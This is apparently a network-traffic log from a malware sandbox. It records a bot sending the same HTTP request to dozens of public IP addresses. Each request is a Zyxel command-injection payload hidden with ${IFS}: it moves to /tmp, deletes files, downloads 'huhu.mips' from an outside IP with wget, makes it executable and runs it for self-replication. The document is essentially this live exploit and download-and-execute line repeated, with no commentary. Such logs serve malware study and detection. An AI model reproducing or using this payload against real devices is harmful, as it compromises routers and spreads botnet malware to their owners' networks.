                                              Jan 29, 2024 07:03:58.162589073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6279192.168.2.143381835.212.175.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162621021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6280192.168.2.1447722205.118.123.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162663937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6281192.168.2.1435858171.5.140.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162691116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6282192.168.2.145933846.71.140.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162714005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6283192.168.2.1454888190.9.88.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162739038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6284192.168.2.14556981.151.155.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162765026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6285192.168.2.145571885.157.204.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162806034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6286192.168.2.143577889.202.61.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162882090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6287192.168.2.14373881.200.30.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162928104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6288192.168.2.144762643.217.29.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162950993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6289192.168.2.1452898163.76.98.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162990093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6290192.168.2.1441584206.36.167.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163003922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6291192.168.2.146086018.127.14.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163064003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6292192.168.2.1450000175.73.226.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163110018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6293192.168.2.1453082181.198.249.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163158894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6294192.168.2.1456208182.46.225.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163186073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6295192.168.2.143609687.232.200.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163254023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6296192.168.2.1438348203.76.184.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163265944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6297192.168.2.1456462220.29.194.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163288116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6298192.168.2.1441948202.6.87.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163324118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6299192.168.2.144332687.52.225.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163367033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6300192.168.2.1434616210.77.157.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163414001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6301192.168.2.1455022177.10.208.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163463116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6302192.168.2.1459242133.220.10.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163463116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6303192.168.2.1434504189.111.213.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163506985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6304192.168.2.1448246197.36.110.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163546085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6305192.168.2.1457336177.202.93.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163580894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6306192.168.2.1446442145.107.111.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163634062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6307192.168.2.1443926221.160.60.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163674116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6308192.168.2.144986048.217.91.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163729906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6309192.168.2.1447900223.72.195.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163768053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6310192.168.2.144825290.37.61.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163788080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6311192.168.2.1437060170.197.195.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163834095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6312192.168.2.14507848.27.87.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163867950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6313192.168.2.1438412151.110.40.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163899899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6314192.168.2.1434236143.12.151.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163929939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6315192.168.2.1458024176.41.189.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.163973093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6316192.168.2.144085031.16.130.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164032936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6317192.168.2.1439900189.81.57.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164036989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6318192.168.2.1434974157.36.17.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164069891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6319192.168.2.144841639.217.106.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164118052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6320192.168.2.145115889.133.44.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164155960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6321192.168.2.1456432170.218.254.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164202929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6322192.168.2.1441324191.69.45.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164242029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6323192.168.2.1443512186.150.239.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164282084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6324192.168.2.1445830122.250.27.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164311886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6325192.168.2.1442020132.226.231.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164374113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6326192.168.2.145358274.155.100.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164422989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6327192.168.2.143354432.173.220.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164460897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6328192.168.2.14347365.229.68.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164493084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6329192.168.2.1459708187.25.188.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164526939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6330192.168.2.1460774115.183.106.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164563894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6331192.168.2.1448656104.228.46.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164592981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6332192.168.2.1444986207.99.211.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164653063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6333192.168.2.1454590129.65.47.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164685011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6334192.168.2.145392896.87.131.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164731026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6335192.168.2.1444990199.109.206.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164778948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6336192.168.2.1448896133.19.230.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164819002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6337192.168.2.1458830166.177.80.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164874077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6338192.168.2.143921440.140.139.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164915085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6339192.168.2.1456012166.245.85.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.164936066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6340192.168.2.143554059.240.102.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165010929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6341192.168.2.1440822141.26.44.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165013075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6342192.168.2.145222837.68.25.88443
                                              TimestampBytes transferredDirectionData
